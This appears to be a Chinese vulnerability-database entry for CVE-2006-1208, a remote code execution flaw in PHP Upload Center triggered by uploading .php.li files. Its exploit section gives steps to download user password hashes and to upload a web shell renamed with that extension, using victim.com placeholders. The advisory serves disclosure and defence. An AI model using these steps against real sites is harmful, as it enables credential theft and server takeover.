Sergey Korostel PHP上载中心 .php.li扩展名任意代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195755 漏洞类型 未知
发布时间 2006-03-13 更新时间 2006-03-13
CVE编号 CVE-2006-1208 CNNVD-ID CNNVD-200603-225
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/88069
https://cxsecurity.com/issue/WLB-2006030057
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-225
|漏洞详情
SergeyKorostelPHP上载中心可以让远程攻击者通过上载一个以.php.li扩展名结尾的文件,执行任意PHP代码,该扩展名可从上载目录中访问。
|漏洞EXP
PHP Upload Center Download users password hashes And phpshell Upload

Site:http://ksv.hypermart.net/php/
----------------------------------------------------
1)Download users password hashes:

http://victim.com/path/users/username

2)phpshell Upload

Example:

Download http://geocities.com/liz0zim/shell.php

And shell.php Save As shell.php.li

And Upload Web Site

http://victim.com/path/files/shell.php.li

----------------------------------------------------
Credit :Liz0ziM
Website:www.biyosecurity.com
Mail   :liz0 (at) bsdmail (dot) com [email concealed]

------------------------------------------------------

Source:
http://www.blogcu.com/Liz0ziM/317250/
http://biyosecurity.be/bugs/phpuploadcenter2.txt
|受影响的产品
Sergey Korostel Php Upload Center 0
|参考资料

来源:BUGTRAQ
名称:20060309PHPUploadCenterDownloaduserspasswordhashesAndphpshellUpload
链接:http://www.securityfocus.com/archive/1/archive/1/427215/100/0/threaded
来源:MISC
链接:http://www.scripts-by.net/PHP/File-Manipulation/php-upload-center.html
来源:OSVDB
名称:23626
链接:http://www.osvdb.org/23626
来源:VUPEN
名称:ADV-2006-0817
链接:http://www.frsirt.com/english/advisories/2006/0817
来源:MISC
链接:http://www.blogcu.com/Liz0ziM/317250/
来源:SECUNIA
名称:19107
链接:http://secunia.com/advisories/19107
来源:MISC
链接:http://biyosecurity.be/bugs/phpuploadcenter2.txt
来源:SREASON
名称:564
链接:http://securityreason.com/securityalert/564